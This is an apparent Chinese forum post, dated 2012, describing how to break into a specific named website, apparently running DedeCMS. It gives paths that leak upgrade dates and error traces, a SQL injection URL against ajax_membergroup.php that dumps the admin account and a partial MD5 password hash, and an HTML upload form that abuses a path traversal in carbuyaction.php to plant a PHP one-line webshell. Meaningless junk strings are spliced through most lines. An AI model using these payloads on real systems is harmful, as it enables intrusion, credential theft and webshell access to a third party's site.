①注入漏洞。
) J" N4 a# C N; |- J) v" D" ?" `这站 http://www.political-security.com/
* V& T( x- T6 H首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
4 W1 Y% p6 b) ^; G) D' Zwww.political-security.com/data/mysql_error_trace.inc 爆后台5 _ w! S' A- D
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。% c& D6 V h& ]0 x; R& C0 Z+ A' O
然后写上语句
6 x; t7 Q! t/ O查看管理员帐号( X% } p& Z8 C6 a8 K
http://www.political-security.co ... &membergroup=@`
% C4 w* _ }" r+ b2 ]2 ?1 U; H2 p: J6 o7 p! I8 A
admin
& z% ]5 e7 ^" Q) h1 `4 H1 y3 n r2 t
. @) r% V' A% ~7 W查看管理员密码
7 `9 m& O K; l9 v' Q5 Z http://www.political-security.co ... &membergroup=@`! {; \9 [1 p2 h6 d. _' o" m
8 g3 G( h+ W! S
8d29b1ef9f8c5a5af429
4 @9 T5 z& D( i( `1 E8 h/ @. F1 _* R( O4 U
查看管理员密码9 \& e' \( K7 N# ]! \5 _
5 {+ Z& s9 z$ _( t: ~$ p
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
( [+ a6 p6 _6 Z: P9 @
* d( [( c9 w7 M: Z8 i8d24 e7 l2 N0 N3 W3 P
9b1ef9f8c5a5af42
# I! \2 k1 c( s E' k" v, H. T9 c9
, W4 t: K, Z @# h
5 T$ w5 ~1 [3 T: }, {; q: @! _& wcmd5没解出来 只好测试第二个方法. B+ A/ `5 X* L+ N- t- f6 [ T; }7 u
! B1 p. a0 A- u( b/ B: y5 c6 ?) A y f- I* v* p
②上传漏洞:, l! a8 Q! E0 z! o7 W3 L* k
9 ~8 p/ }- T, F! e* C2 n3 \+ J( `只要登陆会员中心,然后访问页面链接
9 ?; e: a! P7 ]6 h/ R& S“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
8 J5 y" M/ ?% |. T% t3 G$ `$ ?' j2 `: G* B5 J9 z
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”, a* m$ C( m# G* U- Y
\: k. G2 }# r1 o; g
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
* X [/ V9 D* O" h: a) n! G8 I
( f" @- y1 y8 E% |) k<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>5 c& B7 k: F" f: e" {* i6 n, L
或者) I; e6 X. v4 r, L+ F5 S* y5 _# d
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对